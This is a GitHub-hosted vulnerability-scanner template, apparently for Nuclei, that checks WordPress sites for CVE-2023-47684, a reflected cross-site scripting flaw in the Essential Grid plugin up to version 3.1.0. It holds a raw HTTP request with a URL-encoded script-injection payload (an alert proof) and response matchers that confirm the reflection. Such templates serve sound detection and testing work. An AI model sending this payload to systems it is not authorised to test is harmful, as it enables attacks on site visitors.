-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathCVE-2023-47684.yaml
34 lines (28 loc) · 1010 Bytes
/
CVE-2023-47684.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
id: CVE-2023-47684
info:
name: CVE-2023-47684
author: 0xpugal
severity: medium
description: Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in ThemePunch OHG Essential Grid plugin <= 3.1.0 versions.
tags: cve,wordpress,xss
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-47684
- https://patchstack.com/database/vulnerability/essential-grid/wordpress-essential-grid-plugin-3-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
requests:
- raw:
- |
GET /wp-admin/admin-ajax.php?action=Essential_Grid_Front_request_ajax&client_action=load_post_content&postid=1&settings={%22lbMax%22:%22\%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%22} HTTP/2
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "alert(document.domain);"
part: body
- type: word
words:
- "lightbox"
part: body
- type: status
status:
- 200